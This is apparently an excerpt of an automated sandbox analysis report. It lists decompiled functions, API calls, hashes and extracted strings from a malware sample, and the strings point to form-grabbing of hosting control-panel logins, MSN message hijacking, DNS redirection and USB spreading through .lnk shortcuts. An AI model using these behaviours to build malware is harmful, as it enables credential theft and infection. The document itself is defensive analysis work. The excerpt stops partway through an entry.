                                                                  • Instruction ID: 932cc7a2230090d39bbedd9688339fd4891fded00908d606f370be7e0ea6408c
                                                                  • Opcode Fuzzy Hash: 57b28443d6339407f4bb483d10d5ab8964cf87f8e9a9965947bc74028fcd8489
                                                                  • Instruction Fuzzy Hash: E95119B6F4020926D733BA29BC42EAA73ACDB94315F04C565FC0CD6206FA75EC504AE1
                                                                  Function 0040AE00 Relevance: 34.7, APIs: 23, Instructions: 165stringmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,?,00407CC2,00000000,00412914,?,?,?,?,?,?), ref: 0040AE11
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000001,?,00407CC2,00000000,00412914,?,?,?,?,?,?,?,00000000), ref: 0040AE23
                                                                  • HeapAlloc.KERNEL32(?,00000008,-00000002,?,?,?,?,?,?,00000000), ref: 0040AE41
                                                                  • strstr.MSVCRT ref: 0040AE59
                                                                  • lstrcpyA.KERNEL32(00000000,?), ref: 0040AE70
                                                                  • lstrcpyA.KERNEL32(00000000,?), ref: 0040AE77
                                                                  • lstrcatA.KERNEL32(00000000,00412B54), ref: 0040AE7F
                                                                  • strtok.MSVCRT ref: 0040AE8E
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040AEA1
                                                                  • _strnicmp.MSVCRT ref: 0040AEA6
                                                                  • strtok.MSVCRT ref: 0040AEB9
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0040AED5
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0040AEEB
                                                                  • strstr.MSVCRT ref: 0040AF10
                                                                  • lstrlenA.KERNEL32(00000001), ref: 0040AF20
                                                                  • lstrlenA.KERNEL32(00000001), ref: 0040AF27
                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040AF2B
                                                                  • lstrlenA.KERNEL32(00000001), ref: 0040AF3D
                                                                  • lstrcpyA.KERNEL32(?,00000001), ref: 0040AF58
                                                                  • lstrlenA.KERNEL32(00000001,?,00000001), ref: 0040AF5F
                                                                  • lstrlenA.KERNEL32(00000001,?,00000001), ref: 0040AF6B
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0040AF82
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0040AF91
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$Heap$Free$lstrcpy$Allocstrstrstrtok$??2@_strnicmplstrcat
                                                                  • String ID:
                                                                  • API String ID: 3119447416-0
                                                                  • Opcode ID: 90aa6b444a65bc303e4c0c8d939ed632e773fc8290ec026285192ba5a7dd26f4
                                                                  • Instruction ID: 1bbc8982e5118dc887994d25652db9e03b56cb4a90299a9d625484b85630a4b0
                                                                  • Opcode Fuzzy Hash: 90aa6b444a65bc303e4c0c8d939ed632e773fc8290ec026285192ba5a7dd26f4
                                                                  • Instruction Fuzzy Hash: 1F418F75641314BBD7209F65DC81FAB77A8EF49701F14402AFA04A7390DA78ED128BEA
                                                                  Function 0036AE00 Relevance: 34.7, APIs: 23, Instructions: 165stringmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,?,00367CC2,00000000,00372914,?,?,?,?,?,?), ref: 0036AE11
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000001,?,00367CC2,00000000,00372914,?,?,?,?,?,?,?,00000000), ref: 0036AE23
                                                                  • HeapAlloc.KERNEL32(?,00000008,-00000002,?,?,?,?,?,?,00000000), ref: 0036AE41
                                                                  • strstr.MSVCRT ref: 0036AE59
                                                                  • lstrcpyA.KERNEL32(00000000,?), ref: 0036AE70
                                                                  • lstrcpyA.KERNEL32(00000000,?), ref: 0036AE77
                                                                  • lstrcatA.KERNEL32(00000000,00372B54), ref: 0036AE7F
                                                                  • strtok.MSVCRT ref: 0036AE8E
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0036AEA1
                                                                  • _strnicmp.MSVCRT ref: 0036AEA6
                                                                  • strtok.MSVCRT ref: 0036AEB9
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0036AED5
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0036AEEB
                                                                  • strstr.MSVCRT ref: 0036AF10
                                                                  • lstrlenA.KERNEL32(00000001), ref: 0036AF20
                                                                  • lstrlenA.KERNEL32(00000001), ref: 0036AF27
                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0036AF2B
                                                                  • lstrlenA.KERNEL32(00000001), ref: 0036AF3D
                                                                  • lstrcpyA.KERNEL32(?,00000001), ref: 0036AF58
                                                                  • lstrlenA.KERNEL32(00000001,?,00000001), ref: 0036AF5F
                                                                  • lstrlenA.KERNEL32(00000001,?,00000001), ref: 0036AF6B
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0036AF82
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0036AF91
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$Heap$Free$lstrcpy$Allocstrstrstrtok$??2@_strnicmplstrcat
                                                                  • String ID:
                                                                  • API String ID: 3119447416-0
                                                                  • Opcode ID: c631367499de9199c1341ade7e5faf1fd0dfbb9d18409ba75ce6a88f1c3d6464
                                                                  • Instruction ID: 741f67acc86f9c2dbbcd1f78467e102db1703d48067add52a4b9ba084dd85718
                                                                  • Opcode Fuzzy Hash: c631367499de9199c1341ade7e5faf1fd0dfbb9d18409ba75ce6a88f1c3d6464
                                                                  • Instruction Fuzzy Hash: 88418576600614ABD7229F69DC81F6B77ACEF45710F148018FA08EB240DB75ED01DBE2
                                                                  Function 00407C00 Relevance: 33.4, APIs: 7, Strings: 12, Instructions: 175stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • strstr.MSVCRT ref: 00407C62
                                                                  • _stricmp.MSVCRT(?,cPanel,blog,%s-%s-%s,?,?,00000000), ref: 00407D58
                                                                  • _stricmp.MSVCRT(00000000,WHM), ref: 00407D71
                                                                  • _stricmp.MSVCRT(?,WHCMS), ref: 00407D8A
                                                                  • _stricmp.MSVCRT(?,Directadmin), ref: 00407DA3
                                                                    • Part of subcall function 0040A310: memset.MSVCRT ref: 0040A335
                                                                    • Part of subcall function 0040A310: memset.MSVCRT ref: 0040A34F
                                                                    • Part of subcall function 0040A310: memset.MSVCRT ref: 0040A369
                                                                    • Part of subcall function 0040A310: _vsnprintf.MSVCRT ref: 0040A382
                                                                    • Part of subcall function 0040A310: sprintf.MSVCRT ref: 0040A39A
                                                                    • Part of subcall function 0040A310: lstrlenA.KERNEL32(30e44aa1,?,?,00000000,000003FF,?,00000000,756F59EB,?,004074EB,%s.%s,blk,?,?,000001FE,00410A8E), ref: 0040A3AD
                                                                    • Part of subcall function 0040A310: _snprintf.MSVCRT ref: 0040A3CC
                                                                    • Part of subcall function 0040A310: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000,756F59EB,?,004074EB), ref: 0040A3DB
                                                                    • Part of subcall function 0040A310: sprintf.MSVCRT ref: 0040A3EC
                                                                    • Part of subcall function 0040A310: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 0040A3FB
                                                                    • Part of subcall function 0040A310: lstrlenA.KERNEL32(30e44aa1,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 0040A404
                                                                    • Part of subcall function 0040A310: EnterCriticalSection.KERNEL32(0044AC34,?,?,00000000), ref: 0040A436
                                                                    • Part of subcall function 0040A310: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000), ref: 0040A452
                                                                    • Part of subcall function 0040A310: LeaveCriticalSection.KERNEL32(0044AC34,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A464
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 00407E02
                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 00407E12
                                                                    • Part of subcall function 004073E0: memset.MSVCRT ref: 00407401
                                                                    • Part of subcall function 004073E0: memset.MSVCRT ref: 00407419
                                                                    • Part of subcall function 004073E0: lstrlenA.KERNEL32(?), ref: 00407431
                                                                    • Part of subcall function 004073E0: _snprintf.MSVCRT ref: 00407449
                                                                    • Part of subcall function 004073E0: _vsnprintf.MSVCRT ref: 0040746B
                                                                    • Part of subcall function 004073E0: lstrlenA.KERNEL32(?), ref: 0040747A
                                                                    • Part of subcall function 00407330: memset.MSVCRT ref: 00407351
                                                                    • Part of subcall function 00407330: lstrlenA.KERNEL32(?), ref: 00407369
                                                                    • Part of subcall function 00407330: _snprintf.MSVCRT ref: 00407381
                                                                    • Part of subcall function 00407330: _vsnprintf.MSVCRT ref: 004073A3
                                                                    • Part of subcall function 00407330: lstrlenA.KERNEL32(00000000), ref: 004073B2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$memset$_stricmp$_snprintf_vsnprintf$??3@CriticalSectionsprintf$CreateEnterFileLeavestrstr
                                                                  • String ID: %s-%s-%s$%s.%s ->> %s (%s : %s)$%s.%s ->> %s : %s$4)A$Directadmin$WHCMS$WHM$blog$cPanel$ffgrab$httplogin$iegrab
                                                                  • API String ID: 3716863481-1807948723
                                                                  • Opcode ID: 8e4f81b2d5485fabb06ec203c6989b96bd99bc9d27faae7ca63cca2e9aaad175
                                                                  • Instruction ID: 7c69c185b85492ea0b4eb43dfbe131e2600de0d92cd53af2a8a27ef6520c0e50
                                                                  • Opcode Fuzzy Hash: 8e4f81b2d5485fabb06ec203c6989b96bd99bc9d27faae7ca63cca2e9aaad175
                                                                  • Instruction Fuzzy Hash: EC5193B4E04215ABEB10DB95DC42EFB736CAF40704B15443FF905A2282E678FD91C6AE
                                                                  Function 00367C00 Relevance: 33.4, APIs: 7, Strings: 12, Instructions: 175stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • strstr.MSVCRT ref: 00367C62
                                                                  • _stricmp.MSVCRT(?,cPanel,blog,%s-%s-%s,?,?,00000000), ref: 00367D58
                                                                  • _stricmp.MSVCRT(00000000,WHM), ref: 00367D71
                                                                  • _stricmp.MSVCRT(?,WHCMS), ref: 00367D8A
                                                                  • _stricmp.MSVCRT(?,Directadmin), ref: 00367DA3
                                                                    • Part of subcall function 0036A310: memset.MSVCRT ref: 0036A335
                                                                    • Part of subcall function 0036A310: memset.MSVCRT ref: 0036A34F
                                                                    • Part of subcall function 0036A310: memset.MSVCRT ref: 0036A369
                                                                    • Part of subcall function 0036A310: _vsnprintf.MSVCRT ref: 0036A382
                                                                    • Part of subcall function 0036A310: sprintf.MSVCRT ref: 0036A39A
                                                                    • Part of subcall function 0036A310: lstrlenA.KERNEL32(30e44aa1,?,?,00000000,000003FF,?,00000000,756F59EB,?,003674EB,%s.%s,blk,?,?,000001FE,00370A8E), ref: 0036A3AD
                                                                    • Part of subcall function 0036A310: _snprintf.MSVCRT ref: 0036A3CC
                                                                    • Part of subcall function 0036A310: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000,756F59EB,?,003674EB), ref: 0036A3DB
                                                                    • Part of subcall function 0036A310: sprintf.MSVCRT ref: 0036A3EC
                                                                    • Part of subcall function 0036A310: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 0036A3FB
                                                                    • Part of subcall function 0036A310: lstrlenA.KERNEL32(30e44aa1,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 0036A404
                                                                    • Part of subcall function 0036A310: EnterCriticalSection.KERNEL32(003AAC34,?,?,00000000), ref: 0036A436
                                                                    • Part of subcall function 0036A310: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000), ref: 0036A452
                                                                    • Part of subcall function 0036A310: LeaveCriticalSection.KERNEL32(003AAC34,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0036A464
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 00367E02
                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 00367E12
                                                                    • Part of subcall function 003673E0: memset.MSVCRT ref: 00367401
                                                                    • Part of subcall function 003673E0: memset.MSVCRT ref: 00367419
                                                                    • Part of subcall function 003673E0: lstrlenA.KERNEL32(?), ref: 00367431
                                                                    • Part of subcall function 003673E0: _snprintf.MSVCRT ref: 00367449
                                                                    • Part of subcall function 003673E0: _vsnprintf.MSVCRT ref: 0036746B
                                                                    • Part of subcall function 003673E0: lstrlenA.KERNEL32(?), ref: 0036747A
                                                                    • Part of subcall function 00367330: memset.MSVCRT ref: 00367351
                                                                    • Part of subcall function 00367330: lstrlenA.KERNEL32(?), ref: 00367369
                                                                    • Part of subcall function 00367330: _snprintf.MSVCRT ref: 00367381
                                                                    • Part of subcall function 00367330: _vsnprintf.MSVCRT ref: 003673A3
                                                                    • Part of subcall function 00367330: lstrlenA.KERNEL32(00000000), ref: 003673B2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$memset$_stricmp$_snprintf_vsnprintf$??3@CriticalSectionsprintf$CreateEnterFileLeavestrstr
                                                                  • String ID: %s-%s-%s$%s.%s ->> %s (%s : %s)$%s.%s ->> %s : %s$4)7$Directadmin$WHCMS$WHM$blog$cPanel$ffgrab$httplogin$iegrab
                                                                  • API String ID: 3716863481-676380799
                                                                  • Opcode ID: 535b596cd893ffc66ec09648fd66526777b89c669e547febab36ee4814bcaca9
                                                                  • Instruction ID: 1cb93d9b12c2960222ef66e05034ea52ed31e335adf413d4d28e7d2e0034a101
                                                                  • Opcode Fuzzy Hash: 535b596cd893ffc66ec09648fd66526777b89c669e547febab36ee4814bcaca9
                                                                  • Instruction Fuzzy Hash: 2F51E5B5E04619EBDB33DB958C52DBB736CAF40708F44C458F809A6205E675ED41CBA1
                                                                  Function 004025D0 Relevance: 31.7, APIs: 7, Strings: 14, Instructions: 191stringmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • sscanf.MSVCRT ref: 0040260F
                                                                    • Part of subcall function 004107D0: lstrlenA.KERNEL32(*&@,?,?,00000000,?,0040262A,?,00417008), ref: 004107DC
                                                                    • Part of subcall function 004107D0: lstrcpyA.KERNEL32(00000000,*&@,?,00417008), ref: 004107F9
                                                                  • strstr.MSVCRT ref: 0040264F
                                                                    • Part of subcall function 00407700: memset.MSVCRT ref: 0040771E
                                                                    • Part of subcall function 00407700: _snprintf.MSVCRT ref: 00407738
                                                                    • Part of subcall function 00407700: lstrlenA.KERNEL32(00000000), ref: 00407747
                                                                  • atoi.MSVCRT(00000000), ref: 004026FB
                                                                  • atoi.MSVCRT(00000000), ref: 00402713
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040276B
                                                                  • lstrlenA.KERNEL32(00000000,00000000), ref: 0040278C
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 004027F9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$atoi$FreeHeap_snprintflstrcpymemsetsscanfstrstr
                                                                  • String ID: %s.p10-> Message hijacked!$%s.p10-> Message to %s hijacked!$%s.p21-> Message hijacked!$CAL $CAL %d %256s$MSG $MSG $SDG $X-MMS-IM-Format:$baddr$msn$msnint$msnmsg$msnu
                                                                  • API String ID: 1527159713-2027340701
                                                                  • Opcode ID: 1c5d60f0838a4e54170bf3970975cd604f4ddaf8ef4ca16fad64ff7d9a58d065
                                                                  • Instruction ID: cc3cb0c7f7b4e0dd65bdd1dfcfed23b6e80cb0fd4157fe51233a31162f211526
                                                                  • Opcode Fuzzy Hash: 1c5d60f0838a4e54170bf3970975cd604f4ddaf8ef4ca16fad64ff7d9a58d065
                                                                  • Instruction Fuzzy Hash: 0B515775E4020477CB206BA56D86AEF7764AB45714F20847BFD04B33C2E6FD9980869F
                                                                  Function 003625D0 Relevance: 31.7, APIs: 7, Strings: 14, Instructions: 191stringmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • sscanf.MSVCRT ref: 0036260F
                                                                    • Part of subcall function 003707D0: lstrlenA.KERNEL32(*&6,?,?,00000000,?,0036262A,?,00377008), ref: 003707DC
                                                                    • Part of subcall function 003707D0: lstrcpyA.KERNEL32(00000000,*&6,?,00377008), ref: 003707F9
                                                                  • strstr.MSVCRT ref: 0036264F
                                                                    • Part of subcall function 00367700: memset.MSVCRT ref: 0036771E
                                                                    • Part of subcall function 00367700: _snprintf.MSVCRT ref: 00367738
                                                                    • Part of subcall function 00367700: lstrlenA.KERNEL32(00000000), ref: 00367747
                                                                  • atoi.MSVCRT(00000000), ref: 003626FB
                                                                  • atoi.MSVCRT(00000000), ref: 00362713
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0036276B
                                                                  • lstrlenA.KERNEL32(00000000,00000000), ref: 0036278C
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003627F9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$atoi$FreeHeap_snprintflstrcpymemsetsscanfstrstr
                                                                  • String ID: %s.p10-> Message hijacked!$%s.p10-> Message to %s hijacked!$%s.p21-> Message hijacked!$CAL $CAL %d %256s$MSG $MSG $SDG $X-MMS-IM-Format:$baddr$msn$msnint$msnmsg$msnu
                                                                  • API String ID: 1527159713-2027340701
                                                                  • Opcode ID: 1915d2fad71cb37156907ea4dc6ef3850055bbc2ed6a83d47d636cd9b121c0cf
                                                                  • Instruction ID: bb131852047eae81de508fab3d6ee05acb819f20b58e8ecd491b9142b99f412b
                                                                  • Opcode Fuzzy Hash: 1915d2fad71cb37156907ea4dc6ef3850055bbc2ed6a83d47d636cd9b121c0cf
                                                                  • Instruction Fuzzy Hash: 01516B76E40604A7CB336E68AC82DEF77A8DB41711F52C469F80CA6246E6799940CB93
                                                                  Function 0040EFE0 Relevance: 31.6, APIs: 13, Strings: 5, Instructions: 106stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcmp$AttributesFile_snprintfmemsetstrrchr$ExtensionFindPath
                                                                  • String ID: %windir%\system32\cmd.exe$&&%%windir%%\explorer.exe %%cd%%%s$.lnk$/c "start %%cd%%RECYCLED\%s$RECYCLED
                                                                  • API String ID: 1691573101-2902080580
                                                                  • Opcode ID: 0b2a0d9fb9959b21254efb4a692907e5e256905912d78335b834429a10a9ba5e
                                                                  • Instruction ID: b7277a1c29d753c849b745b8ec094361e978608dab2ca0d9a5f82dce8da3388c
                                                                  • Opcode Fuzzy Hash: 0b2a0d9fb9959b21254efb4a692907e5e256905912d78335b834429a10a9ba5e
                                                                  • Instruction Fuzzy Hash: 3431C77264431566E730A655DC02FEB726CAF88741F040076FA08B51C2DBFC9D958AB9
                                                                  Function 0036EFE0 Relevance: 31.6, APIs: 13, Strings: 5, Instructions: 106stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcmp$AttributesFile_snprintfmemsetstrrchr$ExtensionFindPath
                                                                  • String ID: %windir%\system32\cmd.exe$&&%%windir%%\explorer.exe %%cd%%%s$.lnk$/c "start %%cd%%RECYCLED\%s$RECYCLED
                                                                  • API String ID: 1691573101-2902080580
                                                                  • Opcode ID: cb8ad6721e4d87ec7f39294856003c42afe840920829cfb3b86e003e84590f01
                                                                  • Instruction ID: 1a017a722a6918e891848e6f0bfc1472fcee8fecd363be39be280562f28b78be
                                                                  • Opcode Fuzzy Hash: cb8ad6721e4d87ec7f39294856003c42afe840920829cfb3b86e003e84590f01
                                                                  • Instruction Fuzzy Hash: B631E872640205AAE733F758EC42FEB776CEF49B81F058074FA0CA51C5DBB899418AB1
                                                                  Function 0040E590 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 141stringmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0040E5B0
                                                                  • EnterCriticalSection.KERNEL32(0044B3C8), ref: 0040E5C9
                                                                  • strtok.MSVCRT ref: 0040E5FE
                                                                  • strstr.MSVCRT ref: 0040E617
                                                                  • strstr.MSVCRT ref: 0040E62D
                                                                  • strstr.MSVCRT ref: 0040E642
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040E655
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040E65B
                                                                  • lstrcpyA.KERNEL32(00000000,00411335), ref: 0040E678
                                                                  • lstrcpynA.KERNEL32(00000000,00000000,00000000), ref: 0040E687
                                                                    • Part of subcall function 00407500: lstrlenA.KERNEL32(?), ref: 0040752B
                                                                    • Part of subcall function 00407500: _snprintf.MSVCRT ref: 00407547
                                                                    • Part of subcall function 00407500: _vsnprintf.MSVCRT ref: 00407569
                                                                    • Part of subcall function 00407500: lstrcmpA.KERNEL32(?,bdns), ref: 0040758B
                                                                    • Part of subcall function 00407500: StrStrIA.SHLWAPI(?,00000000), ref: 0040759F
                                                                    • Part of subcall function 00407500: lstrlenA.KERNEL32(?), ref: 004075B9
                                                                  • strtok.MSVCRT ref: 0040E6CF
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 0040E71E
                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040E72D
                                                                  • LeaveCriticalSection.KERNEL32(0044B3C8), ref: 0040E73A
                                                                    • Part of subcall function 0040AA10: memset.MSVCRT ref: 0040AA31
                                                                    • Part of subcall function 0040AA10: lstrcpyA.KERNEL32(00000000,Mozilla/4.0), ref: 0040AA45
                                                                    • Part of subcall function 0040AA10: InternetOpenA.WININET(00000000,?,?,?,?), ref: 0040AA60
                                                                    • Part of subcall function 0040AA10: lstrlenA.KERNEL32(?), ref: 0040AA78
                                                                    • Part of subcall function 0040AA10: InternetOpenUrlA.WININET(?,?,?,00000000,04000000,00000000), ref: 0040AA8C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$strstr$CriticalInternetOpenSectionlstrcpymemsetstrtok$??3@EnterFreeHeapLeave_snprintf_vsnprintflstrcmplstrcpyn
                                                                  • String ID: [DNS]: Blocked %d domain(s) - Redirected %d domain(s)$bdns$block
                                                                  • API String ID: 1940452476-536441337
                                                                  • Opcode ID: 921dcc9b7f1d705da7d3d61043ea9afed801f3cc7dc2e83370c089568948aadd
                                                                  • Instruction ID: 8fc5987a9c18eaf0ca0f86d422a7c70f959c4985efb5a17c84fe55bca5c7fef6
                                                                  • Opcode Fuzzy Hash: 921dcc9b7f1d705da7d3d61043ea9afed801f3cc7dc2e83370c089568948aadd
                                                                  • Instruction Fuzzy Hash: C3412E71E403087BD710A7A69C42DFF7778DB94304F144867FA04F3291E6BD5A9086A9
                                                                  Function 0036E590 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 141stringmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0036E5B0
                                                                  • EnterCriticalSection.KERNEL32(003AB3C8), ref: 0036E5C9
                                                                  • strtok.MSVCRT ref: 0036E5FE
                                                                  • strstr.MSVCRT ref: 0036E617
                                                                  • strstr.MSVCRT ref: 0036E62D
                                                                  • strstr.MSVCRT ref: 0036E642
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0036E655
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0036E65B
                                                                  • lstrcpyA.KERNEL32(00000000,00371335), ref: 0036E678
                                                                  • lstrcpynA.KERNEL32(00000000,00000000,00000000), ref: 0036E687
                                                                    • Part of subcall function 00367500: lstrlenA.KERNEL32(?), ref: 0036752B
                                                                    • Part of subcall function 00367500: _snprintf.MSVCRT ref: 00367547
                                                                    • Part of subcall function 00367500: _vsnprintf.MSVCRT ref: 00367569
                                                                    • Part of subcall function 00367500: lstrcmpA.KERNEL32(?,bdns), ref: 0036758B
                                                                    • Part of subcall function 00367500: StrStrIA.SHLWAPI(?,00000000), ref: 0036759F
                                                                    • Part of subcall function 00367500: lstrlenA.KERNEL32(?), ref: 003675B9
                                                                  • strtok.MSVCRT ref: 0036E6CF
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 0036E71E
                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 0036E72D
                                                                  • LeaveCriticalSection.KERNEL32(003AB3C8), ref: 0036E73A
                                                                    • Part of subcall function 0036AA10: memset.MSVCRT ref: 0036AA31
                                                                    • Part of subcall function 0036AA10: lstrcpyA.KERNEL32(00000000,Mozilla/4.0), ref: 0036AA45
                                                                    • Part of subcall function 0036AA10: InternetOpenA.WININET(00000000,?,?,?,?), ref: 0036AA60
                                                                    • Part of subcall function 0036AA10: lstrlenA.KERNEL32(?), ref: 0036AA78
                                                                    • Part of subcall function 0036AA10: InternetOpenUrlA.WININET(?,?,?,00000000,04000000,00000000), ref: 0036AA8C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$strstr$CriticalInternetOpenSectionlstrcpymemsetstrtok$??3@EnterFreeHeapLeave_snprintf_vsnprintflstrcmplstrcpyn
                                                                  • String ID: [DNS]: Blocked %d domain(s) - Redirected %d domain(s)$bdns$block
                                                                  • API String ID: 1940452476-536441337
                                                                  • Opcode ID: 3649bb28a49ba9e32fe3ab473c5c6ee2d2af3fdb32f88f25ec2be92d087e65ec
                                                                  • Instruction ID: d74445a59a13708af8c1c81b3c1913895c813fb73a4b4b03a8e372245998d27b
                                                                  • Opcode Fuzzy Hash: 3649bb28a49ba9e32fe3ab473c5c6ee2d2af3fdb32f88f25ec2be92d087e65ec
                                                                  • Instruction Fuzzy Hash: 03411B7A900308BBD733A7A8DC86CEF777CDB94700F148145F90DA6145E6755A44CBA1
                                                                  Function 00401290 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 146threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Filewcsstr$Attributes$ExitMoveThread
                                                                  • String ID: %s.%S$DBWIN$\\.\pipe$brk$dll$exe$ruskill
                                                                  • API String ID: 294512176-1976196219
                                                                  • Opcode ID: 48d7f3f0eb3b726049e84ec773c3056d91b4342cd67e91c13d54214b385f08ee
                                                                  • Instruction ID: 4833d87296635a158d7d196af6d8583f31ed7f658b3926ae01176550d546c900
                                                                  • Opcode Fuzzy Hash: 48d7f3f0eb3b726049e84ec773c3056d91b4342cd67e91c13d54214b385f08ee
                                                                  • Instruction Fuzzy Hash: 9141F071600309ABE7109F55AC46FDB3358EB48315F14413AFE04A26E1E7789954C6AE
                                                                  Function 00361290 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 146threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
